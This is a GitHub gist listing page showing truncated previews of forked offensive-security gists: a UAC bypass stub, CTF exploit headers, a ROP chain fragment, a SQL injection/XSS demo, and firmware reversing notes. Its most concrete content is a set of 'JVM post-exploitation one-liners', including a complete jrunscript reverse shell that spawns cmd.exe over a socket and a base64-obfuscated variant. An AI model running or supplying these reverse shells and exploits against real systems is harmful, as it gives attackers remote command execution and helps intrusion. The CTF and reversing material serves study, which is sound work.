@idkwim
idkwim / akagi_58a.c
Created October 24, 2019 05:26 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,

Reversing Raw Binary Firmware Files in Ghidra

This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.

Prep work in Binwalk

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any ELF, Mach-O, or PE header to describe the binary.

While I am using Cisco IOS images in this example, the same process should apply to other raw binary firmware images.

@idkwim
idkwim / JVM_POST_EXPLOIT.md
Created July 29, 2019 13:39 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@idkwim
idkwim / jacking75_CSharp_System
Created July 23, 2019 04:27 — forked from jacking75/jacking75_CSharp_System
C# System Programming
==Running another process==
System.Diagnostics.Process.Start(@"실행파일경로\실행파일명.exe", 파라메터); // verbatim string (@) so the backslash is not read as an escape sequence
System.Diagnostics.Process.Start("cmd.exe", "/c 명령어"); // the command belongs in the arguments parameter, not in the file name
==Terminating a process==
// proc is the System.Diagnostics.Process instance returned by Process.Start
proc.Close(); // Releases the resources held for the process (does not itself terminate it).
proc.CloseMainWindow(); // Sends a close message to a process that has a UI, asking it to exit.
proc.Kill(); // Terminates the process immediately.
@idkwim
idkwim / webs01.py
Created July 2, 2019 08:37 — forked from hackeris/webs01.py
SQL Injection and XSS demo on flask(Python).
# -*- coding: utf-8 -*-
import os
import sqlite3
from flask import Flask
from flask import redirect
from flask import request
from flask import session
from jinja2 import Template
@idkwim
idkwim / exploit.html
Created June 24, 2019 01:08 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
//#define LOCAL_EXP
#ifdef LOCAL_EXP
printf("Testing ROP chain \n");
vm_address_t payload =0x118800000;
kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
CHECK_MACH_ERR(kr,"vm_allocate()");
memcpy((void*)payload, main_payload,payload_size);
char *buf = malloc(1000);
memset(buf,0xcc,1000);
@idkwim
idkwim / remote
Created January 23, 2019 06:25 — forked from Jinmo/remote
scripts
#!/bin/bash
# ./remote server port 'menu string'
touch "$1" || (echo "Cannot create file named $1" && exit 1)
exec > "$1"
echo 'from pwn import *'
echo ''
echo -e "HOST, PORT = \"$2\", \"$3\""
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi
@idkwim
idkwim / exploit-heapheaven.py
Created January 21, 2019 02:37 — forked from n30m1nd/exploit-heapheaven.py
Hack.lu 2017 - HeapHeaven write-up
#!/usr/bin/python
# Hack.lu CTF 2017 - HeapHeaven solution by n30m1nd
# Challenge by FluxFingers - https://flatearth.fluxfingers.net/
from pwn import *
from sys import *
from struct import *
def translate_baby(size):
@idkwim
idkwim / Reversing Aruba Instant.md
Created January 20, 2019 10:49
Reversing Aruba Instant Firmware

Aruba produces two different software loads for their access point hardware. The first is called ArubaOS and the second is called Aruba Instant. With ArubaOS, the AP requires a Mobility Controller (hardware) to be installed in the network. With Aruba Instant it is possible to run APs independently (standalone mode) or in a cluster, with no Mobility Controller in the network.